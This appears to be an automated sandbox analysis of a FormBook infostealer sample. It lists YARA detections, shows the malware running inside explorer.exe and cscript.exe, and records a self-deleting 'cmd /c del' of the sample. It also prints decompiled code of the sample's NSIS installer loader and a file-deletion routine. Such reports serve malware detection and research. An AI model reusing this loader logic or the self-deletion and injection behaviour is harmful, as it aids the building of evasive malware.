                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    Chronological Activities

                                    Analysis Process: explorer.exe PID: 3352 Parent PID: 1304

                                    General

                                    Start time:19:59:18
                                    Start date:02/12/2021
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0x7ff720ea0000
                                    File size:3933184 bytes
                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    Chronological Activities

                                    Analysis Process: cscript.exe PID: 4816 Parent PID: 3352

                                    General

                                    Start time:19:59:40
                                    Start date:02/12/2021
                                    Path:C:\Windows\SysWOW64\cscript.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\cscript.exe
                                    Imagebase:0x1300000
                                    File size:143360 bytes
                                    MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:moderate

                                    Chronological Activities

                                    Analysis Process: cmd.exe PID: 3192 Parent PID: 4816

                                    General

                                    Start time:19:59:44
                                    Start date:02/12/2021
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
                                    Imagebase:0xd80000
                                    File size:232960 bytes
                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Chronological Activities

                                    Analysis Process: conhost.exe PID: 2332 Parent PID: 3192

                                    General

                                    Start time:19:59:46
                                    Start date:02/12/2021
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7f20f0000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Chronological Activities

                                    Disassembly

                                    Code Analysis

                                    Reset < >

                                      Analysis Process: Y1p8VPvyU2.exe PID: 7100 Parent PID: 1688 Y1p8VPvyU2.exeCOMMON

                                      Executed Functions

                                      Function 004030E3, Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270filestringcomCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 83%
                                      			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				intOrPtr _t71;
				intOrPtr _t77;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				intOrPtr _t113;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x42ec18 = _t34;
				 *0x42eb64 = E00405C49(8);
				SHGetFileInfoA(0x428f90, 0,  &_v360, 0x160, 0); // executed
				E0040592B("oryzytcrolozawnhxg Setup", "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\hardz\\Desktop\\Y1p8VPvyU2.exe\" ";
				E0040592B(_t96, _t39);
				 *0x42eb60 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\hardz\\Desktop\\Y1p8VPvyU2.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00434001;
				}
				_t44 = CharNextA(E00405449(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E00405449(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								_t45 = _t44 + 2;
								__eflags = _t44 + 2;
								E0040592B("C:\\Users\\hardz\\AppData\\Local\\Temp", _t45);
								L20:
								_t105 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t48 = E004030AF(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C0B(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E00403464();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x42ebf4; // 0x0
											if(__eflags != 0) {
												_t106 = E00405C49(3);
												_t100 = E00405C49(4);
												_t55 = E00405C49(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x42ec0c; // 0xffffffff
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E004051EC(_v408, 0x200010);
										ExitProcess(2);
									}
									_t113 =  *0x42eb7c; // 0x0
									if(_t113 == 0) {
										L31:
										 *0x42ec0c =  *0x42ec0c | 0xffffffff;
										_v400 = E00403489();
										goto L32;
									}
									_t103 = E00405449(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										_t101 = "C:\\Users\\hardz\\Desktop";
										if(lstrcmpiA(_t105, "C:\\Users\\hardz\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E0040592B("C:\\Users\\hardz\\AppData\\Local\\Temp", _t101);
										}
										E0040592B(0x42f000, _v396);
										 *0x42f400 = 0x41;
										_t98 = 0x1a;
										do {
											_t71 =  *0x42eb70; // 0x720250
											E0040594D(0, _t98, 0x428b90, 0x428b90,  *((intOrPtr*)(_t71 + 0x120)));
											DeleteFileA(0x428b90);
											if(_v416 != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\Y1p8VPvyU2.exe", 0x428b90, 1) != 0) {
												_push(0);
												_push(0x428b90);
												E00405679();
												_t77 =  *0x42eb70; // 0x720250
												E0040594D(0, _t98, 0x428b90, 0x428b90,  *((intOrPtr*)(_t77 + 0x124)));
												_t79 = E0040518B(0x428b90);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x42f400 =  *0x42f400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E00405679();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E004054FF(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E0040592B("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									E0040592B("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E004030AF(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}









































                                      0x004030ef
                                      0x004030f3
                                      0x004030fb
                                      0x004030fd
                                      0x00403102
                                      0x0040310d
                                      0x00403114
                                      0x0040311c
                                      0x00403126
                                      0x0040313c
                                      0x0040314c
                                      0x00403151
                                      0x00403157
                                      0x0040315e
                                      0x00403171
                                      0x00403176
                                      0x00403178
                                      0x0040317a
                                      0x0040317f
                                      0x0040317f
                                      0x0040318f
                                      0x00403195
                                      0x004031fe
                                      0x004031fe
                                      0x00403200
                                      0x00403202
                                      0x00000000
                                      0x00000000
                                      0x0040319b
                                      0x0040319e
                                      0x004031a6
                                      0x004031a6
                                      0x004031a9
                                      0x004031ae
                                      0x004031b0
                                      0x004031b0
                                      0x004031b1
                                      0x004031b1
                                      0x004031b6
                                      0x004031b9
                                      0x004031ee
                                      0x004031f3
                                      0x004031f8
                                      0x004031fb
                                      0x004031fd
                                      0x004031fd
                                      0x004031fd
                                      0x00000000
                                      0x004031bb
                                      0x004031bb
                                      0x004031bc
                                      0x004031bf
                                      0x004031c7
                                      0x004031ca
                                      0x004031cc
                                      0x004031cc
                                      0x004031cc
                                      0x004031ca
                                      0x004031cf
                                      0x004031d5
                                      0x004031dd
                                      0x004031e0
                                      0x004031e2
                                      0x004031e2
                                      0x004031e2
                                      0x004031e0
                                      0x004031e5
                                      0x004031ec
                                      0x00403206
                                      0x00403209
                                      0x00403209
                                      0x00403212
                                      0x00403217
                                      0x00403217
                                      0x00403222
                                      0x00403228
                                      0x0040322d
                                      0x0040322f
                                      0x00403251
                                      0x00403256
                                      0x0040325d
                                      0x00403264
                                      0x00403268
                                      0x004032cf
                                      0x004032cf
                                      0x004032d4
                                      0x004032de
                                      0x004033c9
                                      0x004033cf
                                      0x004033da
                                      0x004033e3
                                      0x004033e5
                                      0x004033ea
                                      0x004033ec
                                      0x004033ee
                                      0x004033f0
                                      0x004033f2
                                      0x004033f4
                                      0x004033f6
                                      0x00403406
                                      0x00403408
                                      0x0040340a
                                      0x00403417
                                      0x00403426
                                      0x0040342e
                                      0x00403436
                                      0x00403436
                                      0x0040340a
                                      0x004033f6
                                      0x004033f2
                                      0x0040343b
                                      0x00403441
                                      0x00403443
                                      0x00403447
                                      0x00403447
                                      0x00403443
                                      0x0040344c
                                      0x00403451
                                      0x00403454
                                      0x00403456
                                      0x00403456
                                      0x0040345e
                                      0x0040345e
                                      0x004032ed
                                      0x004032f4
                                      0x004032f4
                                      0x0040326a
                                      0x00403270
                                      0x004032bf
                                      0x004032bf
                                      0x004032cb
                                      0x00000000
                                      0x004032cb
                                      0x00403279
                                      0x00403286
                                      0x0040327d
                                      0x00403283
                                      0x00000000
                                      0x00000000
                                      0x00403285
                                      0x00403285
                                      0x00403285
                                      0x0040328a
                                      0x0040328c
                                      0x00403294
                                      0x00403300
                                      0x00403305
                                      0x00403314
                                      0x00000000
                                      0x00000000
                                      0x00403318
                                      0x0040331f
                                      0x00403325
                                      0x0040332b
                                      0x00403333
                                      0x00403333
                                      0x00403341
                                      0x00403348
                                      0x00403351
                                      0x00403357
                                      0x00403357
                                      0x00403363
                                      0x00403369
                                      0x00403373
                                      0x00403387
                                      0x00403388
                                      0x00403389
                                      0x0040338e
                                      0x0040339a
                                      0x004033a0
                                      0x004033a7
                                      0x004033aa
                                      0x004033b0
                                      0x004033b0
                                      0x004033a7
                                      0x004033b4
                                      0x004033ba
                                      0x004033ba
                                      0x004033bd
                                      0x004033be
                                      0x004033bf
                                      0x00000000
                                      0x004033bf
                                      0x00403296
                                      0x00403298
                                      0x004032a3
                                      0x00000000
                                      0x00000000
                                      0x004032ab
                                      0x004032b6
                                      0x004032bb
                                      0x00000000
                                      0x004032bb
                                      0x00403237
                                      0x00403243
                                      0x00403248
                                      0x0040324d
                                      0x0040324f
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040324f
                                      0x00000000
                                      0x004031ec
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004031a0
                                      0x004031a0
                                      0x004031a0
                                      0x004031a1
                                      0x004031a1
                                      0x00000000
                                      0x004031a0
                                      0x00000000

                                      APIs
                                      • #17.COMCTL32 ref: 00403102
                                      • SetErrorMode.KERNELBASE(00008001), ref: 0040310D
                                      • OleInitialize.OLE32(00000000), ref: 00403114
                                        • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                        • Part of subcall function 00405C49: LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                                        • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                      • SHGetFileInfoA.SHELL32(00428F90,00000000,?,00000160,00000000,00000008), ref: 0040313C
                                        • Part of subcall function 0040592B: lstrcpynA.KERNEL32(?,?,00000400,00403151,oryzytcrolozawnhxg Setup,NSIS Error), ref: 00405938
                                      • GetCommandLineA.KERNEL32(oryzytcrolozawnhxg Setup,NSIS Error), ref: 00403151
                                      • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,00000000), ref: 00403164
                                      • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,00000020), ref: 0040318F
                                      • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403222
                                      • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403237
                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403243
                                      • DeleteFileA.KERNELBASE(1033), ref: 00403256
                                      • OleUninitialize.OLE32(00000000), ref: 004032D4
                                      • ExitProcess.KERNEL32 ref: 004032F4
                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,00000000,00000000), ref: 00403300
                                      • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,00000000,00000000), ref: 0040330C
                                      • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403318
                                      • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040331F
                                      • DeleteFileA.KERNEL32(00428B90,00428B90,?,0042F000,?), ref: 00403369
                                      • CopyFileA.KERNEL32(C:\Users\user\Desktop\Y1p8VPvyU2.exe,00428B90,00000001), ref: 0040337D
                                      • CloseHandle.KERNEL32(00000000,00428B90,00428B90,?,00428B90,00000000), ref: 004033AA
                                      • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004033FF
                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 0040343B
                                      • ExitProcess.KERNEL32 ref: 0040345E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                      • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\Y1p8VPvyU2.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Y1p8VPvyU2.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$oryzytcrolozawnhxg Setup$~nsu.tmp
                                      • API String ID: 2278157092-3211056458
                                      • Opcode ID: 42fbd4ffd9c76b05c6d7acdaa9b905c8558d3fdf648afba1936b073eb85bdc76
                                      • Instruction ID: aabb0dff5c64eb2fc36eb922ef2e6ed89ac062b0c308e186071ee6cedd25840a
                                      • Opcode Fuzzy Hash: 42fbd4ffd9c76b05c6d7acdaa9b905c8558d3fdf648afba1936b073eb85bdc76
                                      • Instruction Fuzzy Hash: F491E370908740AEE7216FA2AD49B6B7E9CEB0570AF04047FF541B61D2C77C9E058B6E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405250, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 94%
                                      			E00405250(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E004054FF(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x42ebe8 =  *0x42ebe8 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E0040592B(0x42afe0, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E00405465(_t72);
					} else {
						lstrcatA(0x42afe0, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x40900c);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x42afe0,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E00405449( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E0040592B(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E004055E3(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404CC9(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x42ebe8 =  *0x42ebe8 + 1;
										} else {
											E00404CC9(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E00405679();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405250(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x42afe0 - 0x5c;
					if( *0x42afe0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405C22(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E0040541E(_t72);
							E004055E3(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404CC9(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404CC9(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E00405679();
						}
						L33:
						 *0x42ebe8 =  *0x42ebe8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                      0x0040525b
                                      0x0040525f
                                      0x00405268
                                      0x0040526b
                                      0x0040526e
                                      0x00405276
                                      0x00405278
                                      0x00405279
                                      0x00000000
                                      0x00405279
                                      0x00405288
                                      0x00405288
                                      0x0040528b
                                      0x0040528e
                                      0x004052a2
                                      0x004052a9
                                      0x004052ae
                                      0x004052b0
                                      0x004052c0
                                      0x004052b2
                                      0x004052b8
                                      0x004052b8
                                      0x004052c5
                                      0x004052c8
                                      0x004052d3
                                      0x004052d9
                                      0x004052de
                                      0x004052ee
                                      0x004052f0
                                      0x004052f6
                                      0x004052f9
                                      0x004052fc
                                      0x004053b9
                                      0x004053b9
                                      0x004053bd
                                      0x004053bf
                                      0x004053bf
                                      0x004053bf
                                      0x004053bf
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00405302
                                      0x00405302
                                      0x0040530b
                                      0x00405311
                                      0x00405316
                                      0x00405319
                                      0x0040531b
                                      0x0040531f
                                      0x00405321
                                      0x00405321
                                      0x0040531f
                                      0x00405324
                                      0x00405327
                                      0x0040533a
                                      0x0040533c
                                      0x00405341
                                      0x00405348
                                      0x00405360
                                      0x00405366
                                      0x0040536c
                                      0x0040536e
                                      0x00405393
                                      0x00405370
                                      0x00405370
                                      0x00405374
                                      0x00405388
                                      0x00405376
                                      0x00405379
                                      0x0040537e
                                      0x00405380
                                      0x00405381
                                      0x00405381
                                      0x00405374
                                      0x0040534a
                                      0x00405350
                                      0x00405352
                                      0x00405358
                                      0x00405358
                                      0x00405352
                                      0x00000000
                                      0x00405348
                                      0x00405329
                                      0x0040532c
                                      0x0040532e
                                      0x00000000
                                      0x00000000
                                      0x00405330
                                      0x00405332
                                      0x00000000
                                      0x00000000
                                      0x00405334
                                      0x00405338
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00405398
                                      0x004053a2
                                      0x004053a8
                                      0x004053a8
